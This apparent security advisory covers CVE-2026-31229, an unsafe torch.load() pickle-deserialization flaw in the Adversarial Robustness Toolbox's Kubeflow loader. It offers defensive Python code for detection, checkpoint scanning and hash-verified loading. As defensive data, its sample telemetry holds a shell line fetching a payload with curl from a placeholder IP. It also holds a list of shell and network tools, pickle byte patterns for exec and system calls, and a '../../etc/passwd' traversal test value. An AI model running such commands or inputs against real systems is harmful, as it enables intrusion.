CVE-2026-31229 Overview
CVE-2026-31229 is an insecure deserialization vulnerability [CWE-502] in the Adversarial Robustness Toolbox (ART) through version 1.20.1. The flaw resides in the Kubeflow component's model loading functionality. The code calls torch.load() without the weights_only=True parameter when loading model weight files such as model.pt. This permits deserialization of arbitrary Python objects through Python's pickle module. An attacker who controls a referenced model file or the model_id parameter can achieve remote code execution when the pipeline loads the model.
Critical Impact
Unauthenticated attackers can execute arbitrary code on systems running ART robustness evaluation pipelines by supplying a malicious PyTorch model file.
Affected Products
- Adversarial Robustness Toolbox (ART) versions through 1.20.1
- ART Kubeflow component model loading functionality
- Pipelines invoking ART robustness evaluation with attacker-controlled model_id or model storage
Discovery Timeline
- 2026-05-12 - CVE-2026-31229 published to NVD
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2026-31229
Vulnerability Analysis
The Adversarial Robustness Toolbox is an open-source library for machine learning security and robustness evaluation. Its Kubeflow integration loads PyTorch model weights from object storage during evaluation pipelines. The loader invokes torch.load() on attacker-reachable file paths without enabling the weights_only=True safeguard introduced by PyTorch to restrict unpickling to tensor data.
Without this flag, torch.load() falls through to Python's pickle module and reconstructs arbitrary objects. Pickle deserialization executes whatever callable the payload references through its GLOBAL and REDUCE opcodes, which is exactly what a crafted __reduce__ method emits when the payload is serialized. An attacker who can write to the model storage bucket or influence the model_id parameter passed into the pipeline can therefore trigger code execution in the loading process.
Root Cause
The root cause is unsafe deserialization through pickle during model weight loading. The Kubeflow loader trusts the contents of .pt files as benign tensor data. PyTorch's default torch.load() behavior without weights_only=True honors arbitrary pickle opcodes, including REDUCE, which calls a stored callable with stored arguments at load time.
Attack Vector
The attack is network-reachable and requires no authentication or user interaction. An attacker uploads a crafted model.pt file to an object storage location referenced by the pipeline, or sets the model_id parameter to point to such a file. When the pipeline next executes evaluation, the malicious __reduce__ payload runs inside the pipeline worker, providing remote code execution with the privileges of the ART runtime.
No verified public proof-of-concept code is referenced in the advisory. See the GitHub Adversarial Robustness Toolbox repository for component source and the CVE-2026-31229 technical write-up for additional detail.
Detection Methods for CVE-2026-31229
Indicators of Compromise
- Unexpected child processes spawned by Python workers running ART pipelines, particularly shells, curl, wget, or interpreters launched during model load.
- Outbound network connections from Kubeflow pipeline pods to unfamiliar IPs or domains immediately after torch.load() execution.
- New or modified .pt, .pth, or .bin files in object storage buckets that lack a corresponding training job or commit reference.
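The first indicator above (shells, downloaders or other interpreters spawned by a Python pipeline worker) can be checked mechanically against process-exec telemetry. The following Python is an added example, not code from the advisory or the ART project: it walks each exec event's parent chain within a pod and flags suspicious children whose ancestry leads back to a Python worker. The JSON event schema, pod names and command lines are constructed assumptions to map onto your own EDR or eBPF exec events.

```python
"""Flag suspicious child processes of Python workers running ART pipelines.

Added example, not code from the advisory or the ART project. The telemetry
schema (one JSON exec event per line with ts/pod/pid/ppid/comm/cmdline) is a
constructed assumption; adapt the field names to your own telemetry source.
"""
import json

# Process names a model-loading worker has no business spawning.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget",
                       "nc", "ncat", "perl", "ruby", "php"}

# Constructed sample telemetry (hypothetical values): pod art-eval-7f9c shows a
# Python worker spawning a shell that then runs curl; pod art-eval-2b1d shows a
# benign GPU query from a Python worker.
SAMPLE_EVENTS = """
{"ts": "2026-05-12T10:00:01Z", "pod": "art-eval-7f9c", "pid": 101, "ppid": 1, "comm": "python3", "cmdline": "python3 -m art_pipeline.evaluate --model_id resnet50-v3"}
{"ts": "2026-05-12T10:00:03Z", "pod": "art-eval-7f9c", "pid": 102, "ppid": 101, "comm": "sh", "cmdline": "sh -c curl http://203.0.113.5/ -o /tmp/.cache"}
{"ts": "2026-05-12T10:00:03Z", "pod": "art-eval-7f9c", "pid": 103, "ppid": 102, "comm": "curl", "cmdline": "curl http://203.0.113.5/ -o /tmp/.cache"}
{"ts": "2026-05-12T10:00:05Z", "pod": "art-eval-2b1d", "pid": 201, "ppid": 1, "comm": "python3", "cmdline": "python3 -m art_pipeline.evaluate --model_id vit-b16"}
{"ts": "2026-05-12T10:00:06Z", "pod": "art-eval-2b1d", "pid": 202, "ppid": 201, "comm": "nvidia-smi", "cmdline": "nvidia-smi -L"}
"""


def parse_events(text):
    """Parse newline-delimited JSON exec events into dicts."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def _is_python(comm):
    # Matches python, python3, python3.11 and similar interpreter binaries.
    return comm.startswith("python")


def _python_ancestor(event, by_pid, max_depth=8):
    """Walk the parent chain (same pod) and return the nearest Python ancestor,
    or None if the chain leaves the pod or contains no Python process."""
    cur = event
    for _ in range(max_depth):
        parent = by_pid.get((cur["pod"], cur["ppid"]))
        if parent is None:
            return None
        if _is_python(parent["comm"]):
            return parent
        cur = parent
    return None


def detect_suspicious_children(events):
    """Return one finding per suspicious process descended from a Python worker."""
    by_pid = {(e["pod"], e["pid"]): e for e in events}
    findings = []
    for e in events:
        if e["comm"] not in SUSPICIOUS_CHILDREN:
            continue
        worker = _python_ancestor(e, by_pid)
        if worker is None:
            continue
        findings.append({
            "ts": e["ts"], "pod": e["pod"], "pid": e["pid"], "comm": e["comm"],
            "cmdline": e["cmdline"], "python_worker": worker["cmdline"],
        })
    return findings


if __name__ == "__main__":
    for finding in detect_suspicious_children(parse_events(SAMPLE_EVENTS)):
        print(f"[{finding['pod']}] pid {finding['pid']} {finding['comm']!r} "
              f"spawned under: {finding['python_worker']}")
```

The walk stops at pod boundaries and after a fixed depth so that a ppid loop or a missing parent event cannot hang the detector; in production, join the finding back to the model_id in the worker's command line to identify which artifact was loading at the time.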
Detection Strategies
- Inspect ART and Kubeflow pipeline code for calls to torch.load() without the weights_only=True argument and flag for review.
- Hunt for pickle opcodes such as c__builtin__\nexec or cposix\nsystem within stored model files using YARA or simple byte scanners. The c form is the GLOBAL opcode used by pickle protocols 0 through 3; protocol 4 and later reference globals through STACK_GLOBAL, with the module and attribute names pushed as separate strings, so byte patterns must cover both encodings or the stream should be parsed rather than grepped.
- Correlate model file write events in object storage with the identity and source of the uploader to identify unauthorized model artifacts.
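Parsing the pickle stream rather than grepping it catches both GLOBAL and STACK_GLOBAL references, including ones that reach the module name through the memo table. The following Python is an added example, not code from the advisory or the ART project: it scans a .pt file (zip layout with data.pkl members, or a raw legacy stream of consecutive pickles) with a restricted Unpickler whose find_class records every module.name it is asked for and returns an inert stand-in instead of importing, so nothing from the file ever executes. The allowlist of globals that a tensor-only state_dict references is an assumption and should be extended for your own artifacts; the sample checkpoints are constructed in memory, with datetime.date standing in for any unexpected callable.

```python
"""Static scan of PyTorch checkpoint files for non-allowlisted pickle globals.

Added example, not code from the advisory or the ART project. The pickle VM's
container-building opcodes run, but find_class never imports anything, so the
file's own code is never executed. ALLOWED_GLOBALS is an assumption covering a
plain state_dict checkpoint.
"""
import datetime
import io
import pickle
import zipfile
from collections import OrderedDict

# Assumed allowlist: the globals a tensor-only state_dict pickle references.
ALLOWED_GLOBALS = {
    "collections.OrderedDict",
    "torch._utils._rebuild_tensor_v2",
    "torch._utils._rebuild_parameter",
    "torch.Size",
    "torch.FloatStorage", "torch.HalfStorage", "torch.BFloat16Storage",
    "torch.DoubleStorage", "torch.LongStorage", "torch.IntStorage",
    "torch.ByteStorage", "torch.BoolStorage",
}


class _Opaque:
    """Inert stand-in returned for every global and persistent id, so REDUCE,
    NEWOBJ, BUILD, SETITEMS and APPENDS all succeed without real classes."""
    def __init__(self, *args, **kwargs): pass
    def __call__(self, *args, **kwargs): return _Opaque()
    def __setstate__(self, state): pass
    def __setitem__(self, key, value): pass
    def append(self, item): pass
    def extend(self, items): pass


class _RecordingUnpickler(pickle.Unpickler):
    """Records every module.name the stream asks for (GLOBAL and STACK_GLOBAL
    both arrive here with memo references already resolved) and never imports."""
    def __init__(self, stream):
        super().__init__(stream)
        self.globals_seen = set()

    def find_class(self, module, name):
        self.globals_seen.add(f"{module}.{name}")
        return _Opaque

    def persistent_load(self, pid):  # torch stores tensor storages as persistent ids
        return _Opaque()


def _scan_stream(stream, max_pickles=8):
    """Scan consecutive pickles in one byte string (legacy torch files chain the
    magic number, protocol, sys_info and the object as separate pickles)."""
    buf, seen, error, count = io.BytesIO(stream), set(), None, 0
    while buf.tell() < len(stream) and count < max_pickles:
        up = _RecordingUnpickler(buf)
        try:
            up.load()
        except Exception as exc:  # non-pickle trailer (storage bytes) or corruption
            seen |= up.globals_seen
            if count == 0:
                error = f"{type(exc).__name__}: {exc}"
            break
        seen |= up.globals_seen
        count += 1
    if count == 0 and error is None:
        error = "no pickle data"
    return seen, error


def scan_checkpoint(data, allowed=ALLOWED_GLOBALS):
    """Return the globals a .pt/.pth file references and a verdict against the allowlist."""
    found, errors = set(), []
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                if name.endswith(".pkl"):
                    g, err = _scan_stream(zf.read(name))
                    found |= g
                    if err:
                        errors.append(f"{name}: {err}")
    else:
        found, err = _scan_stream(data)
        if err:
            errors.append(err)
    disallowed = sorted(found - set(allowed))
    verdict = "suspicious" if disallowed else ("unparseable" if errors else "clean")
    return {"globals": sorted(found), "disallowed": disallowed,
            "errors": errors, "verdict": verdict}


def make_zip_checkpoint(obj):
    """Constructed stand-in for torch.save's zip layout (archive/data.pkl), so the
    scanner can be exercised here without torch installed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("archive/data.pkl", pickle.dumps(obj))
        zf.writestr("archive/version", "3\n")
    return buf.getvalue()


# Constructed samples: a state_dict-like OrderedDict; a file whose pickle reaches
# for a global outside the allowlist; and a two-pickle chain like a legacy prefix.
BENIGN_CKPT = make_zip_checkpoint(OrderedDict([("layer.weight", [0.1, 0.2])]))
SUSPECT_CKPT = make_zip_checkpoint(datetime.date(2026, 5, 12))
LEGACY_SAMPLE = pickle.dumps(1) + pickle.dumps(OrderedDict())

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_CKPT), ("suspect", SUSPECT_CKPT)):
        print(label, scan_checkpoint(blob))
```

The scanner still interprets the pickle stream, so a hostile file can make it allocate heavily or recurse deeply; run it under memory and time limits in a throwaway process, and treat an "unparseable" verdict as a reason to quarantine rather than to load.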
Monitoring Recommendations
- Enable runtime process and network telemetry on Kubeflow worker nodes and forward to a centralized analytics platform for behavioral analysis.
- Audit access logs on the object storage buckets backing model registries for writes from non-pipeline identities.
- Track invocations of ART evaluation jobs and the model_id values they resolve, alerting on values outside an allowlist of trusted artifact paths.
How to Mitigate CVE-2026-31229
Immediate Actions Required
- Upgrade Adversarial Robustness Toolbox to a release later than 1.20.1 that addresses the deserialization flaw once published by the maintainers.
- Patch local forks and downstream pipelines to invoke torch.load(..., weights_only=True) for every model load path until the upstream fix is integrated.
- Restrict write access on model storage buckets to a small set of trusted service accounts and revoke broad write permissions from pipeline users.
Patch Information
Monitor the Trusted-AI Adversarial Robustness Toolbox repository for fixed releases and security advisories. No vendor patch identifier is listed in the NVD entry at the time of publication. Apply the maintainer-provided fix as soon as it is released and rebuild any container images that bundle ART.
Workarounds
- Pass weights_only=True explicitly to every torch.load() call in pipeline code that handles untrusted model artifacts.
- Validate the integrity of model files using cryptographic signatures or hashes recorded at training time before loading them in evaluation pipelines.
- Isolate Kubeflow pipeline workers in a sandboxed namespace with egress filtering so that an exploited worker cannot reach internal services or the internet.
# Configuration example (Python): enforce safe PyTorch deserialization in pipeline code.
# Replace the unsafe model loading
#     model = torch.load(model_path)
# with the restricted form, which limits unpickling to tensors and primitive
# containers (weights_only is available in PyTorch 1.13 and later); model_path
# is the resolved artifact path.
import torch
model = torch.load(model_path, weights_only=True)

# Configuration example (shell, gsutil): restrict bucket writes to the training
# service account only. The first command removes every role bound to allUsers;
# the second grants object creation to the trusted identity.
gsutil iam ch -d allUsers gs://art-model-registry
gsutil iam ch serviceAccount:training@project.iam.gserviceaccount.com:objectCreator gs://art-model-registry
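The workarounds above (an allowlist of trusted model_id values, hash validation against digests recorded at training time, and weights_only=True on every load) fit together as one gate in front of torch.load(). The following Python is an added example, not code from the advisory or the ART project: it rejects model_id values that fail a naming policy or escape the registry directory, requires the id to be present in a manifest of training-time sha256 digests, compares the on-disk digest in constant time, and only then deserializes. The registry layout (<registry>/<model_id>/model.pt), the manifest format, the naming policy and the constructed demo registry are all assumptions; torch is imported lazily so the verification logic runs without it.

```python
"""Gate model loading on an allowlisted model_id and a training-time sha256
manifest, then load with weights_only=True.

Added example, not code from the advisory or the ART project. The registry
layout, manifest format and naming policy are assumptions; the constructed
demo registry holds placeholder bytes rather than real weights.
"""
import hashlib
import hmac
import os
import re
import tempfile

# Assumed naming policy: no separators or traversal sequences can survive this.
MODEL_ID_RE = re.compile(r"^[a-z0-9][a-z0-9._-]{0,63}$")


class ModelVerificationError(Exception):
    pass


def sha256_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def resolve_model_path(model_id, registry_dir):
    """Map a model_id onto its artifact path, refusing ids that escape the registry."""
    if not MODEL_ID_RE.fullmatch(model_id):
        raise ModelVerificationError(f"model_id rejected by naming policy: {model_id!r}")
    root = os.path.realpath(registry_dir)
    path = os.path.realpath(os.path.join(root, model_id, "model.pt"))
    if os.path.commonpath([root, path]) != root:
        raise ModelVerificationError(f"model_id resolves outside the registry: {model_id!r}")
    return path


def verify_model_artifact(model_id, registry_dir, manifest):
    """Return the artifact path only if model_id passes policy, is in the manifest
    (the allowlist) and the file's sha256 equals the training-time digest."""
    path = resolve_model_path(model_id, registry_dir)
    if model_id not in manifest:
        raise ModelVerificationError(f"model_id not in trusted manifest: {model_id!r}")
    if not os.path.isfile(path):
        raise ModelVerificationError(f"artifact missing: {path}")
    if not hmac.compare_digest(sha256_file(path), manifest[model_id]):
        raise ModelVerificationError(f"sha256 mismatch for {model_id!r}; refusing to load")
    return path


def load_verified_model(model_id, registry_dir, manifest):
    """Verify first, then deserialize with weights_only=True (PyTorch >= 1.13)."""
    path = verify_model_artifact(model_id, registry_dir, manifest)
    import torch  # assumption: a PyTorch release with weights_only support is installed
    return torch.load(path, map_location="cpu", weights_only=True)


def verification_outcome(model_id, registry_dir, manifest):
    """'ok' or the refusal reason, suitable for the alerting on rejected model_id values."""
    try:
        verify_model_artifact(model_id, registry_dir, manifest)
        return "ok"
    except ModelVerificationError as exc:
        return f"rejected: {exc}"


def build_demo_registry():
    """Constructed registry with one trusted artifact and one whose on-disk bytes
    no longer match the manifest (simulating a replaced model.pt)."""
    root = tempfile.mkdtemp(prefix="art-registry-")
    manifest = {}
    for model_id, content in (("resnet50-v3", b"constructed weights A"),
                              ("vit-b16", b"constructed weights B")):
        os.makedirs(os.path.join(root, model_id))
        path = os.path.join(root, model_id, "model.pt")
        with open(path, "wb") as f:
            f.write(content)
        manifest[model_id] = sha256_file(path)  # digest recorded by the training job
    with open(os.path.join(root, "vit-b16", "model.pt"), "ab") as f:
        f.write(b" tampered")                 # artifact overwritten after training
    return root, manifest


if __name__ == "__main__":
    root, manifest = build_demo_registry()
    for mid in ("resnet50-v3", "vit-b16", "unknown-model", "../../etc/passwd"):
        print(mid, "->", verification_outcome(mid, root, manifest))
```

Keep the manifest somewhere the pipeline identity can read but not write (a signed file in the training job's output, or a separate bucket with its own IAM), otherwise an attacker who can replace model.pt can replace the digest alongside it.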
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.